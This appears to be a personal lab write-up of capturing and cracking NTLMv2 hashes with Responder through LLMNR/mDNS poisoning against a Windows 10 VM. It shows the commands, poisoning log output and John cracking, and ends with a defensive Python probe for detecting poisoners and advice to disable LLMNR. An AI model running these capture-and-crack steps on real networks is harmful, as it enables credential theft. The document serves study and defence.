Local lab setup:
Host machine (Kali): 192.168.43.209
Virtual machine: VirtualBox
Network: bridged, so the VM and the host stay on the same subnet
OS: Windows 10 Home (the initial system uses the default password from the VirtualBox install process, changeme!)
Responder
Simulation:
Windows 10 uses the initial password
Start Responder on Kali:
python ./Responder.py -wd -I wlan0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
.
.
.
[+] Current Session Variables:
Responder Machine Name [WIN-R0J1ROPSQKF]
Responder Domain Name [TTQT.LOCAL]
Responder DCE-RPC Port [45338]
[+] Listening for events...
On Windows 10, open a share connection from cmd:
net use \\x
Kali receives the interaction from Windows 10.
Then press Ctrl+C to quit Responder and run ./DumpHash.py
The hash values are saved.
Two DumpNTLMv2.txt files are now saved locally; start cracking (this step usually finishes very quickly):
john DumpNTLMv2.txt
Change the Windows 10 account password
In this step, change the password to a complex one (Wan0729!@#) and repeat the steps above; problems start at roughly step 2:
the Windows 10 share connection misbehaves,
and Responder cannot read the hash.
[+] Current Session Variables:
Responder Machine Name [WIN-NHOH627GLXN]
Responder Domain Name [OXH5.LOCAL]
Responder DCE-RPC Port [49638]
[+] Listening for events...
[*] [DHCP] Found DHCP server IP: 192.168.43.110, now waiting for incoming requests...
[*] [MDNS] Poisoned answer sent to 192.168.43.238 for name x.local
[*] [MDNS] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x.local
[*] [MDNS] Poisoned answer sent to 192.168.43.238 for name x.local
[*] [LLMNR] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x
[*] [MDNS] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x.local
[*] [LLMNR] Poisoned answer sent to 192.168.43.238 for name x
[*] [LLMNR] Poisoned answer sent to fe80::8d78:9e01:5573:135e for name x
[*] [LLMNR] Poisoned answer sent to 192.168.43.238 for name x
[*] Skipping previously captured hash for .\vboxuser
It gets stuck at the password-cracking stage.
After changing the password to changeme1 instead, it can be cracked again, which shows this is still a weak-password attack at heart; pretty underwhelming, haha.
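As a defender-side addition that is not part of these notes or of Responder itself, the probe below detects an LLMNR poisoner like the one in this lab: it multicasts an LLMNR query for a random name that no host owns, so any answer at all comes from something spoofing names (the behaviour behind the "Poisoned answer sent ... for name x" lines above). It assumes the probing machine sits on the same broadcast domain as the poisoner; the canary name, transaction id and the sample reply in the comments are constructed.

```python
import os, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR IPv4 multicast group and port

def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR (RFC 4795) reuses DNS wire format: header, one A/IN question, no answers."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def _skip_name(data: bytes, off: int) -> int:
    """Return the offset just past the (possibly compressed) DNS name at off."""
    while data[off] != 0:
        if data[off] & 0xC0 == 0xC0:  # compression pointer: 2 bytes, ends the name
            return off + 2
        off += data[off] + 1
    return off + 1

def parse_llmnr_answer(data: bytes, txid: int) -> list:
    """Return IPv4 addresses from A answers of a reply to our txid, else []."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an == 0:  # not a response to our query
        return []
    addrs, off = [], 12
    for _ in range(qd):  # the question section is echoed back; skip it
        off = _skip_name(data, off) + 4
    for _ in range(an):
        off = _skip_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return addrs

def probe_for_poisoner(timeout: float = 2.0) -> list:
    """Query a random name nobody owns; only a poisoner answers. Returns (src, advertised_ip)."""
    name, txid = "canary-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        hits = []
        try:
            while True:
                data, (src, _) = sock.recvfrom(1024)
                hits += [(src, ip) for ip in parse_llmnr_answer(data, txid)]
        except socket.timeout:
            return hits
```

Run probe_for_poisoner() from the Windows side of a lab like this one; a hit such as (192.168.43.209, 192.168.43.209) points straight at the Responder host. Disabling LLMNR through the "Turn off multicast name resolution" policy removes the exposure outright, and NBT-NS and mDNS need their own canaries.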